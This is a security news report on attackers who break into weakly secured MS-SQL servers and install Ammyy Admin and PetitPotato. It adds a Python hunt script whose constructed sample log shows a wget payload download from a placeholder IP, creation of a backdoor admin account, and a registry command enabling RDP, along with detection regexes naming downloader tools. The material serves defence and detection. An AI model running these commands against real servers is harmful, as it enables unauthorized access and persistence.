Cybercriminals Exploit MS-SQL Servers to Gain Remote Access via Ammyy Admin

A recently reported campaign shows cybercriminals actively targeting poorly managed Microsoft SQL (MS-SQL) servers.

Once they get into an improperly secured or misconfigured SQL Server instance, the attackers deploy a remote access tool, Ammyy Admin, together with a privilege escalation tool, PetitPotato, to establish and maintain unauthorized access to the host.

Sophisticated Multi-Stage Intrusion and Persistence Techniques

The attack chain begins with threat actors scanning the internet for MS-SQL servers whose database port is exposed and logging in with weak or default passwords, often against the built-in sa account.

After the initial login, the attackers run operating system commands from inside the database, typically through extended stored procedures such as xp_cmdshell, to enumerate system information and judge whether the host is worth further exploitation. Those commands run with the privileges of the SQL Server service account, which is what the later privilege escalation step exists to overcome.

Using wget, a widely available command-line download utility, they fetch their payloads from attacker-controlled hosts and install them on the compromised server.

Among the payloads are Ammyy Admin, a legitimate remote desktop tool frequently abused for covert remote control, and PetitPotato, a privilege escalation tool used to obtain SYSTEM-level privileges from the lower-privileged account the SQL Server service runs as.

Moving swiftly, the attackers broaden their foothold by enabling Remote Desktop Protocol (RDP) on the server, which gives them ongoing interactive graphical access that no longer depends on the database service.

They also create new local user accounts, often with administrative rights, which entrenches their access and makes detection and removal harder for defenders, since the accounts look like ordinary administrative logins.

Security researchers note that the campaign blends legitimate administration tools with malware, making it difficult for traditional security controls to distinguish authorized from malicious activity.

This dual-use approach raises the odds of evading file-based detection and prolongs the attackers' presence in affected networks; the sequence of actions on the host (the database service spawning a shell, a download, a new account, RDP switched on) is far more distinctive than any single binary.

Symantec and VMware Carbon Black Countermeasures

In response, Symantec has updated its protections to detect and block the campaign's indicators at several layers.

File-based detections, including the signatures Hacktool.Gen, Hacktool.Porttran, Trojan.Gen.MBT and WS.Malware.1, cover the malware and tools used throughout the attack.

Machine learning detections such as Heur.AdvML.A!300, Heur.AdvML.B and related variants add a further layer, flagging novel or suspicious files on heuristic and behavioural indicators.

VMware Carbon Black customers are covered by endpoint protection policies that block execution of known and suspected malware as well as potentially unwanted programs (PUPs).

The Carbon Black Cloud reputation service supplements this by delaying execution of unknown files until a cloud scan completes, improving detection accuracy and reducing false positives.

According to the report, web-based indicators linked to the campaign, including the domains and IP addresses used for payload delivery and lateral movement, are covered by WebPulse-enabled products, which block command-and-control traffic and malware downloads.

Organizations are advised to audit and harden their MS-SQL deployments now: enforce strong authentication (weak or default passwords are the entry point here), and keep the database port and other management interfaces off the public internet.

Patching regularly, monitoring for unexpected account creation and RDP configuration changes, and deploying layered endpoint detection and response tooling are also critical against this class of attack.
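As an added example (not code from the article, Symantec or any other vendor), the following Python script turns the intrusion chain described above and the account-creation monitoring recommended here into a hunt: it tags log lines with a stage (xp_cmdshell enabled, sqlservr.exe spawning a shell, a wget download, a local account created, Administrators membership, RDP enabled) and alerts on a host where a SQL-side entry stage and a persistence stage land inside one time window. The log lines, the simplified `timestamp|host|source|detail` layout, the host names and the 198.51.100.7 address (a TEST-NET-2 documentation range) are all constructed for the example; real deployments would feed it normalised Security event 4688/4720/4732 records and SQL Server ERRORLOG lines.

```python
"""Stage-based hunt for the MS-SQL -> Ammyy Admin / PetitPotato pattern.

Added example, not from the article or any vendor. Input lines use a
constructed 'timestamp|host|source|detail' layout where source is
'sqlerrorlog' (SQL Server ERRORLOG text) or 'sec:<EventID>' (Windows
Security log summary).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Each rule is (stage, regex over "source|detail"). A line may hit several stages.
STAGE_RULES = [
    ("XPCMDSHELL_ENABLED", re.compile(r"^sqlerrorlog\|.*'xp_cmdshell' changed from 0 to 1", re.I)),
    ("SQL_SPAWNS_SHELL", re.compile(r"^sec:4688\|parent=.*?\\sqlservr\.exe\s+cmd=(?:\S*\\)?(cmd|powershell)\.exe", re.I)),
    ("DOWNLOADER", re.compile(r"^sec:4688\|.*\b(wget|curl|certutil|bitsadmin)(?:\.exe)?\b.*https?://", re.I)),
    ("ACCOUNT_CREATED", re.compile(r"^sec:4720\||^sec:4688\|.*\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add", re.I)),
    ("ADMIN_GROUP_ADD", re.compile(r"^sec:4732\|.*group=Administrators|^sec:4688\|.*localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("RDP_ENABLED", re.compile(r"fDenyTSConnections.*(/d\s+0\b|=\s*0\b)", re.I)),
]
INITIAL_ACCESS = {"XPCMDSHELL_ENABLED", "SQL_SPAWNS_SHELL"}
PERSISTENCE = {"ACCOUNT_CREATED", "ADMIN_GROUP_ADD", "RDP_ENABLED"}

# Constructed sample: db01 is the compromised server, db02 a DBA running a
# legitimate shell command from SQL Agent, ws17 an HR workstation account change.
SAMPLE_LOG = r"""
2025-05-12T03:14:07|db01|sqlerrorlog|Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-05-12T03:14:31|db01|sec:4688|parent=C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe cmd=cmd.exe /c whoami /priv & systeminfo
2025-05-12T03:16:02|db01|sec:4688|parent=C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe cmd=cmd.exe /c wget http://198.51.100.7/aa.exe -O C:\Windows\Temp\aa.exe
2025-05-12T03:19:45|db01|sec:4688|parent=C:\Windows\Temp\aa.exe cmd=cmd.exe /c net user support$ P@ssw0rd! /add
2025-05-12T03:19:46|db01|sec:4720|target=support$ subject=NT AUTHORITY\SYSTEM
2025-05-12T03:19:50|db01|sec:4732|member=support$ group=Administrators subject=NT AUTHORITY\SYSTEM
2025-05-12T03:20:12|db01|sec:4688|parent=C:\Windows\Temp\aa.exe cmd=reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
2025-05-12T09:02:10|db02|sec:4688|parent=C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe cmd=cmd.exe /c dir D:\backups
2025-05-12T10:45:00|ws17|sec:4720|target=jdoe subject=CORP\hr-admin
""".strip().splitlines()


def classify(source, detail):
    """Return the set of stage names whose rule matches this line."""
    text = f"{source}|{detail}"
    return {stage for stage, rx in STAGE_RULES if rx.search(text)}


def detect(lines, window_minutes=60, min_stages=3):
    """Return {host: [stages in first-seen order]} for hosts where, inside a
    window_minutes span, at least min_stages distinct stages fire and the set
    contains both a SQL-side entry stage and a persistence stage."""
    window = timedelta(minutes=window_minutes)
    per_host = defaultdict(list)
    for line in lines:
        ts, host, source, detail = line.split("|", 3)
        for stage in classify(source, detail):
            per_host[host].append((datetime.fromisoformat(ts), stage))

    alerts = {}
    for host, hits in per_host.items():
        hits.sort()  # by time, then stage name on ties, so output is deterministic
        for i, (t0, _) in enumerate(hits):
            in_window = [(t, s) for t, s in hits[i:] if t - t0 <= window]
            stages = {s for _, s in in_window}
            if len(stages) >= min_stages and stages & INITIAL_ACCESS and stages & PERSISTENCE:
                ordered = []
                for _, s in in_window:
                    if s not in ordered:
                        ordered.append(s)
                alerts[host] = ordered
                break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for host, chain in detect(SAMPLE_LOG).items():
        print(f"ALERT {host}: " + " -> ".join(chain))
```

On the sample data only db01 alerts, with the full six-stage chain; db02 shows a single `sqlservr.exe` child shell and ws17 a lone account creation, neither of which reaches the threshold. The sequence requirement is what keeps the rule quiet on dual-use tooling: `net user` or `reg add` alone is administration, the same commands minutes after the database service spawned a shell and fetched a binary are an intrusion. Shortening the window or raising `min_stages` trades recall for precision; a `sqlservr.exe` child shell on its own is still worth a low-severity ticket, because xp_cmdshell should normally be disabled.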

As attackers keep refining their tactics, defenders should combine signature-based, machine learning and reputation-driven controls with the hardening and monitoring above to protect critical database infrastructure.

Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
